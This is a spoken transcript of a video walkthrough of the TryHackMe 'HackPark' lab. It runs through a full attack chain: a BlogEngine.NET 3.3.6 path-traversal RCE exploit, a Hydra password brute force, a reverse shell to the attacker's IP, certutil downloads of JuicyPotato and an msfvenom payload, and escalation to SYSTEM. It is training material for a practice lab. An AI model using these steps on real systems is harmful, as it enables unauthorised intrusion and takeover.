Hey everybody, welcome to the channel. My name is Julio and today we are going to do HackPark from TryHackMe. Now I will tell you guys that I'm not going to go through the questions and answer those. This is just mostly to just show you my general process. So let's get started here. I already started the box and I got my IP set. So I always have this already usually set up from previous boxes that I do. So, all right, so we got going. I already see 80 and 3389. Let's just try going to port 80 and see what we get. 792. Okay, there it goes. Since that already, I know that works, and we still have this going. What I'm going to do is just go ahead and first make this a little bit bigger for you. Let's just do GoBuster, and let's do that IP 1010.179.200, and let's get that going. And immediately we get some stuff coming back to us. It looks like just some of the pages. Scripts, okay, that looks cool. Account, oh, admin, that looks cool. Let's let that run for just a little bit. And it looks like we're done. Oh, just two ports, it looks like. Okay, so 80 and 3389. And I see a robots.txt with 6 entries disallowed. Okay, cool. And 3389, which is RDP. Okay, and we'll just let that go for a little bit longer. Go back over here and let me take this and add it to my notes. So I'm going to grab that. Now, I know that a lot of people, and this is a good thing to do, always save it, uh, as an out file. I'm I don't do that as often when I'm doing like these types of boxes, just because I save it in my notes. Let's see here. I'm just getting all this together over here. So let's take a look at that just for robots. Text. Whoops. What did I do? Oh, okay. I'm going to grab this count search started error archive. Okay. Archive and archive.asp. Okay, so that already shows me that this is an ASPX website. So let me make some notes of this. Drop that into my notes. So one thing I'm seeing here is that we have administrator, and down on the bottom, down here, I see author is admin. Okay, so that is a good hint that maybe I have a user named admin. So let me write that down. And I'm going to take a screenshot of this as well. I'll drop that in my notes. And I want to go to this archive. Was it .aspx? All right, so this is kind of interesting here. I see blogengine.net and designed by blogengine.net. So to me, this is an indicator that this might be some of the technology that is being used. And when I see that, the first thing I think of is possible exploits for that. So let me get a screenshot here as well. Let's go back over here. And what's in my other window? Is this still? Okay, I think I can stop this. let's check out this blog engine. So I have a couple of different versions, a lot of 3.3.6 and 7, and a couple of older things, and then a newer one. So let me make a note of this. Search exploit. Grab a little screenshot here, just so I don't have to keep running it again. I can quickly see what was on there. Version, the version of, where does this take me? That takes me to cat. See what that does. Okay, that just took me nowhere. Let's go to view page source, and I'm trying to find the version of blog engine. So let me just look for version. Nope, nothing with version. Blog engine. Let's see, 9 results. Okay, archive. Nothing there. Blog engine. Looking for some sort of version number. Ah, 3.3, perfect. So let's get a screenshot of that. Nice. So, good thing I took this a little earlier, because now that lets me see that I have 3.3.6. So, what do we have here? Directory, traversal, remote code execution. That's awesome. Okay, so we have a couple of Python versions. I guess we'll start with this right here. So we'll do search exploit -m, paste that in there. Sorry, not -m. Well, I mean -m is fine. -m is going to mirror it. It's going to copy it, download that version. But just to look at it, it's going to be -x or TACX, whatever you want to call it, -x. So we'll have a CDE. I like to copy this down because maybe somebody else has a different version of a different payload for this CDE that sometimes maybe works better or will work. So I'll just say that just so I know what to look for. Okay, so path traversal vulnerability linked to remote code execution. This vulnerability affects blogengine.net, the version I have. Okay, the vulnerable code can be seen in this file. First, we set the TCP client address and port within the method below to our attack. This is done by editing posts and clicking. Note that this file must be uploaded as post view. Okay, so this file must be uploaded. Okay, that's kind of important. The admin page that allows upload is app editor edit post. Finally, the vulnerability is triggered by accessing the URL blog. Okay, so this is how we trigger it. And it looks like this is the payload. You know what I'm going to do, actually? I don't always like, so let's do that again, but this time I'm going to do -m so I can grab it. So there it is, 46353.cs, and it's set to save it as, see, I should have done that in the first place. Let's run it again, -x. Set to save it as, where is that? Post view. Let me copy that this time. Jot that down in my notes. Paste. Q to exit out of this. and I have to save it as that. So, oops. So let's just do that. So we're going to move 4.6 to post view.ascx, then ls, and there, okay, we have it. Let's try that again. Code post view.ascx. Static system.io, protect override. Okay, so it's creating sockets here. That looks like something we're going to change. So that's going to be my IP address port for the reverse shell. And then it just keeps creating the shell here. And that's it. So let's go ahead and do that now. 10.13.63.22, that is my IP address. And I always like to use port 443. So Control S to save that. And I think probably put that away for now. Actually, I'll close it. Oh, no, it's fine. Hey, that's different. Contact. Anytime you see anywhere that you can input, you should immediately think SQL injection. That's not my name. John@email.com. Hi. This is a message. See what this does. Looks like nothing. May not be working. Now, again, this is just to show you. So let's grab this, open up Burp. So what I'm going to do is I'm going to set my scope so that it only captures, it only proxies what I want to do. So scope, add, paste, and I'll get rid of that. 10, okay, cool. All right, proxy, turn it on, and now when I reload the page, should see something in the history. Yowza, have all that stuff. So let's clear the history and let's try that one more time. And there's the contact page. Okay, cool. What was that email contact? Does anything happen when I click send? I see a post, but I don't think there was any feedback on the page, right? No, there isn't. So nothing. Okay, so it doesn't seem to do anything. Contact length is 0. But there was a login, I think, from the home page. Login. That is something we care about. Okay, blockage, sweet. So whenever you see anything, admin, admin, never saved, nothing. Okay, admin password. Log engine default credentials. You need to log in username and password both as admin. That's what I already tried. Make sure you change your password. Okay, so I guess the password was changed. But that does confirm that admin is, at least there's a good chance that that could be the username, even if it's not the password. The blog was written by admin, and default is admin. Okay, so that's a good hint. Okay, so let's do admin 42, admin 42. I'm going to resend this, because I want to capture it in burp, because we are going to use Hydra. So we're going to do Control R to send this to repeater, send this post request to repeater. And what we need is mostly this part, and we just want to know this URI here, account login.aspx, all this right here, return. So we need that for Hydra. We need that for Hydra, and we need all of this for Hydra. And we're going to change username to, I think this is called carrot, user carrot, and password admin42. We're going to change that to carrot, PASS capital carrot. So this is basically telling Hydra, this is where the username goes, and this is where the password goes. All right, so let's copy this first. And then let's go back to the terminal. So Hydra-L admin. So lowercase l for if you already know the password. If we didn't know the password, or I'm sorry, the username, if we didn't, we'd be using capital L, and then we would give it, a path to some file, right, that has a list of usernames, admin, John, Sam, Julie, whatever. But since we're not doing that this time, admin. Now we are going to do that for the password, and we're going to use user share wordless rocky.txt, and the IP was 10.10.179.200. We have that, and this is a post form. Now what we need, remember I said we needed that. Let's see, we're going to start our quotes and paste that in. Just a reminder that this always has to start with a slash. So don't ever forget, if you don't have that / right there, it's not going to work. So just add that in there. And then we need a colon, which is a separator for Hydra. And we need to go back to burp and copy all of this. And remember, again, we already made our modifications here. We already put in the carrot pass and the carrot user right here. So we're going to copy this, and we're going to go back to our terminal and just paste that in there. And then we need to go to our website and see. So we have login failed, capital login, capital L, lowercase f, login failed. And then we need a separator, and then it said login failed. And then that's it. And then we want -v to be verbose, -f, which is going to tell Hydra to stop when it finds some credentials. So let's double check this. Hydra -l, use admin, and then use rocku on this IP address. It's a HTTP post form. This is the URI for the form, account login, ASPX, all of this. And then all of this is the information for where the username and password are entered. And it's not always going to be this long. Sometimes it'll just be, like this long. So don't look for this every single time. It just depends on the technology that is doing it. If you're using ASPX, it will probably always look like this or similar. Okay, I think that's good. Let's run that. And we'll let that go for just a little bit. Should stop on its own if we get something. But, oh, here we go. Nice. It finds us. Sweet. Okay, so let's get a screenshot of that and then paste. Fingers crossed. Boom. All right. So next we upload through the file manager version. This is done by editing a post and clicking on the icon that looks like an open file in the toolbar. Okay, cool. So editing a post. We already have a published post. That's the one. That should be the one by the admin. There's one. So edit a post. Clicking on, yeah, that's our page. Or that's our post, I mean. Clicking on the, yeah, file manager. And then upload it. Right? So upload. Home. TryHackMe. This is HackPark. Oh, let's set up a listener. And then let's go. So file must be uploaded. The admin page that allows upload. Finally, the vulnerability is triggered by accessing the base URL for the blog app data. Showing this. So that's going to trigger the payload. So there's that. And then that's going to trigger the payload. I hope. I want to go to, oh, hey, there we go. Nice. Who am I? inet serve ifconfig. Oh, sorry, Windows ipconfig. Nice. Okay, sweet. So let's do what we always do, and let's do who am I? Geez, who am I? /crib. Oh yeah, SE impersonate privilege. This box is done. This box is done. If you see this, it is game over, my friends. We about to be anti-authority. So let's go to. This is a weird shell. Why is it doing that? Okay, it's working. That's all that matters. Users. Jeff. So cd Jeff. That didn't work. cd Jeff. Okay. I guess I don't have permission to get into Jeff. Public. See if that works. Oh, okay, that worked. See how now I have documents, downloads, and stuff where when I was trying to cd into Jeff, it just kept giving me the same information back. All right. So let's go into documents. What I want to do, since I have impersonate available to me, I want to use juicy potato. Well, I guess I think this is an old box, but let's system info HackPark, Microsoft Windows Server 2012, R2, x64. Okay, good. So let's move Juicy Potato over. So let's start a Python server. And let's do cert util-url cache dash f dash split http colon dash 1 nope 10 13 what is my IP 10 13 63 22 and I want the file juicy potato.exe and I'll just call it juicy potato.exe. Hopefully that works. That's a good sign. That's a good sign. Complete successfully. Juicy potato. Nice. And I need a payload from MSF Venom. Will this one work? -P Windows x64 shell reverse TCP. Yeah. .exe. That looks like that'll work. So let's create that. rs.53, perfect. Now let's bring that over. Cert util -url cache -f split http :// 10 13 63 22, correct? Yes. And I want rs53.exe, and I'll call it again rs53.exe. All right. Cert util URL cache split 10 13 62. Okay. Let's bring that over. Oh, darn it. That's not going to work. Yeah. You know why? Because I didn't start my server. Python 3-m http server 80 start. Now I got to type that all again because I doubt. Nope, that doesn't work. Maybe I can just copy that. Copy, paste. That's better. Cool. Juicy potato and my payload, which is port 53. And then we're going to run juicy potato.exe. P is going to be the payload, which is 53.exe. -t star -c, and then hey, Windows 32, who am I? NT Authority System, ipconfig. Actually, this will get cd. Can I go into Jeff now? CD users, Jeff. Yes, I can. Go to the desktop. And there's the user.text. Type user.text. Then we're going to go out to administrator, desktop. And there's root. Type root.text. And just to make sure, config where we are. Who am I? And that is that, guys. We did it. Hey, well, thanks for stopping by, guys. It was super fun doing this with you, and I will see you at the next one.